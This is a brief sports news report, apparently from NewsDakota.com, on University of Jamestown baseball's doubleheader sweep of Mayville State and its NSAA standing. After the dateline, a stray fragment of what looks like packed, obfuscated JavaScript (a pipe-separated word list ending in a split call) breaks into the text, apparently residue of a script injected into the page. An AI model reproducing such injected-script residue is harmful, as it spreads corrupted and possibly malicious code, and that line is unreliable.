JAMESTOWN yhntd|var|u0026u|referrer|kakeh||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The stellar pitching the Jimmies have gotten from Jason Shaw and Tanner Dahl continued Tuesday when the University of Jamestown took two more from Mayville State. They won the opened 11-0 and needed 10 innings to win the nightcap 2-1.

The duo combined for just one run in 12 innings of work. Shaw, who gave up the only run, saw his 22.1 scoreless inning streak in the NSAA end when Mayville pushed across a run in the sixth inning of game two.

With the wins (now 3-1 vs. Mayville) the Jimmies are now in the drivers seat of the NSAA. Jamestown is now 23-6 (8-2) and will play Dakota State Friday and Saturday in Brookings (not Madison where DSU is located).

The Jimmies also climbed closer to the Top-25 poll on Tuesday before the games were even factored in. Jamestown is three spots out of the poll, but continues to garner more votes. A few wins over the Trojans this weekend coupled with their sweep of Mayville and they might finally crack the top-25.
